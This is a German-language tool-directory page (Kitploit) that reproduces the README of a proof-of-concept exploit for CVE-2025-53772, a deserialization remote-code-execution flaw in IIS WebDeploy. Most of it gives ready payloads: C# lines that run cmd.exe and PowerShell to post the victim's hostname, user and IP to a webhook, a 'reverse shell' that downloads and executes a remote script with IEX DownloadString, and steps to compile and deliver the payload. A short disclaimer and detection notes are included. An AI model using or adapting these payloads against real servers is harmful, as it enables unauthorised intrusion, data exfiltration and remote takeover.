Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-53772-IIS-WebDeploy-RCE — Proof-of-concept-Exploit für CVE-2025-53772, eine Remote-Codeausführung-Schwachstelle in IIS WebDeploy durch unsichere Deserialisierung. Beinhaltet anpassbare Payload-Generierung für Informationssammlung, Befehlsausführung und Reverse Shells. | Kitploit
Tools/GitHubGitHub/momollax/cve-2025-53772-iis-webdeploy-rce
ExploitationWebanwendungs-ExploitationCommand and ControlLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubmomollax/cve-2025-53772-iis-webdeploy-rce

CVE-2025-53772-IIS-WebDeploy-RCE

Proof-of-concept-Exploit für CVE-2025-53772, eine Remote-Codeausführung-Schwachstelle in IIS WebDeploy durch unsichere Deserialisierung. Beinhaltet anpassbare Payload-Generierung für Informationssammlung, Befehlsausführung und Reverse Shells.

Repository anzeigen
572vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-53772 – IIS WebDeploy-RCE-Exploit

Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2025-53772, eine Remote-Code-Ausführung-Schwachstelle in IIS WebDeploy durch unsicheres Deserialisieren.

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich eine Testberechtigung haben.

🔧 Schnelleinrichtung

1. Payload anpassen

Bearbeiten Sie den Payload in poc.cs (Zeilen 18‑19), um Ihre Zielaktion festzulegen: csharp// Ersetzen Sie durch Ihre Webhook-URL und gewünschten Payload

root@kitploit:~
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/IHR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");

📋 Payload-Beispiele

3. Exploit bereitstellen Verwenden Sie den generierten Base64-Payload gegen den verwundbaren IIS WebDeploy-Endpunkt: ## 🎯 Schwachstellendetails

Informationssammlung (empfohlen):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/IHR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");

Einfache Befehlsausführung:

root@kitploit:~
csharpset.Add("cmd.exe");
set.Add("/c calc.exe");  // Öffnet Taschenrechner

Reverse Shell (Fortgeschritten):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://IHR-SERVER/shell.ps1')\"");

2. Exploit-Payload generieren

Die GitHub-Aktion kompiliert automatisch den PoC und erstellt den Base64-codierten Payload:

  • Übertragen Sie Ihre Änderungen, um die GitHub-Aktion auszulösen
  • Navigieren Sie zum Tab „Actions“ in Ihrem Repository
  • Klicken Sie auf den letzten Workflow-Durchlauf
  • Finden Sie den generierten Payload in der Konsolenausgabe:
GitHub Actions Payload-Ausgabe
Beispiel für die Bereitstellung des Payloads

CVE-ID: CVE-2025-53772

Betroffene Software: IIS WebDeploy (mehrere Versionen) Schwachstellentyp: Unsicheres Deserialisieren, das zu RCE führt Angriffsvektor: Remote, ohne Authentifizierung Schweregrad: Kritisch

🛠️ Manuelle Kompilierung (optional)

Wenn Sie lokal statt mit GitHub-Aktionen kompilieren möchten: bash# Windows mit .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt

Oder mit Visual Studio

csc poc.cs poc.exe 📡 Einrichten eines Webhooks

  • Gehen Sie zu webhook.site, um eine kostenlose Webhook-URL zu erhalten
  • Ersetzen Sie IHR-WEBHOOK-ID im Payload durch Ihre eindeutige ID
  • Überwachen Sie eingehende Anfragen, um die Ergebnisse der Exploit-Ausführung zu sehen

🔍 Erkennung & Abhilfe

Erkennung:

Überwachen Sie auf ungewöhnliche BinaryFormatter-Deserialisierungsaktivitäten Achten Sie auf verdächtige Prozessausführungen durch IIS-Arbeiterprozesse Netzwerküberwachung auf unerwartete ausgehende Verbindungen

Abhilfe:

Aktualisieren Sie IIS WebDeploy auf die neueste Patch-Version Implementieren Sie Eingabevalidierung und -bereinigung Verwenden Sie Zulassungslisten für Deserialisierungstypen Setzen Sie Netzwerksegmentierung und -überwachung ein

📚 Referenzen

  • CVE-2025-53772 Details
  • Microsoft-Sicherheitshinweis
  • NIST-Schwachstellendatenbank
Tool herunterladen